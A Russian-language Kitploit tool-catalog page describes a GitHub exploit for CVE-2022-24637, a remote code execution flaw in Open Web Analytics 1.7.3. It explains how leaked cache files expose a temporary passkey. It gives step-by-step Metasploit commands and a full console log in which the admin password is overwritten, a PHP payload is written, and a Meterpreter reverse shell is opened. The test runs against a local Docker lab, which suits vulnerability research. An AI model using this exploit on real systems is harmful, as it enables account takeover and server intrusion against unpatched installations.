Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-24637 — Open Web Analytics 1.7.3 - Удаленное выполнение кода | Kitploit
Инструменты/GitHubGitHub/pflegusch/cve-2022-24637
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubpflegusch/cve-2022-24637

CVE-2022-24637

Open Web Analytics 1.7.3 - Удаленное выполнение кода

Репозиторий
43 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Уязвимое приложение

Open Web Analytics (OWA) до версии 1.7.4 позволяет неаутентифицированному удаленному злоумышленнику получить конфиденциальную информацию о пользователях, которая может быть использована для получения привилегий администратора с помощью кэшированных хэшей. Это происходит потому, что файлы, созданные с помощью `<?php (вместо правильной последовательности "<?php) не обрабатываются интерпретатором PHP.

Шаги проверки

  1. Запустите уязвимый экземпляр OWA с помощью docker

    • Скачайте https://github.com/Pflegusch/CVE-2022-24637/blob/main/deployment/docker-compose.yml
    • Запустите контейнеры: docker compose up -d
    • Откройте http://127.0.0.1:80/
    • Следуйте шагам установки, используя переменные окружения из файла docker-compose.yml
      • Публичный URL: http://127.0.0.1/
      • Хост базы данных (docker inspect <db-container> и получить IPAddress, например 172.22.0.2)
      • Порт базы данных: 3306
      • Имя базы данных: owa
      • Пользователь базы данных: owa
      • Пароль базы данных: Demo12+#
      • Продолжить
      • Домен сайта: http://127.0.0.1
      • Имя администратора: admin
      • E-Mail: [email protected]
      • Пароль: Demo12+#
      • Продолжить
  2. Запустите msfconsole

  3. use exploit/multi/http/open_web_analytics_rce

  4. set RHOSTS 127.0.0.1

  5. set RPORT 80

  6. set SSL false

  7. set LHOST 172.22.0.1 -> это должен быть IP-адрес моста, созданного командой docker compose up -d

  8. check

  9. run

Параметры

Password

При эксплуатации цели пароль атакованного пользователя будет перезаписан этим паролем.

Username

Пользователь, который будет целью данной эксплойта.

Расширенные параметры

SearchLimit

Эксплойт работает путем извлечения значения temp_passkey из файла кэша, который создается для каждого пользователя при попытке входа в систему с его помощью. Поскольку каталог /owa-data/caches/ общедоступен, мы можем получить эти файлы кэша. Точный путь к файлам кэша зависит от user_id и может быть вычислен с его помощью. Этот параметр определяет, сколько вычисленных путей, начиная с 0, должно быть проверено на наличие файлов кэша со значением temp_passkey.

Сценарии

Версия 1.7.3 с использованием развертывания docker, описанного выше

root@kitploit:~
msf6 exploit(multi/http/open_web_analytics_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/open_web_analytics_rce) > set LHOST 172.22.0.1
LHOST => 172.22.0.1
msf6 exploit(multi/http/open_web_analytics_rce) > run

[*] Started reverse TCP handler on 172.22.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Open Web Analytics 1.7.3 is vulnerable
[+] Connected to http://127.0.0.1/ successfully!
[*] Attempting to find cache of 'admin' user
[+] Found temporary password for user 'admin': 85038e7e9f541ae4c4939d3044e628a5
[+] Changed the password of 'admin' to 'pwned'
[+] Logged in as admin user
[*] Creating log file
[+] Wrote payload to file
[*] Sending stage (39927 bytes) to 172.22.0.3
[+] Deleted QY0yivK4.php
[*] Meterpreter session 1 opened (172.22.0.1:4444 -> 172.22.0.3:55434) at 2023-03-15 01:28:54 +0100
[+] Triggering payload! Check your listener!

meterpreter > pwd
/var/www/html/owa-data/caches
meterpreter > getuid
Server username: www-data
meterpreter >
Скачать инструмент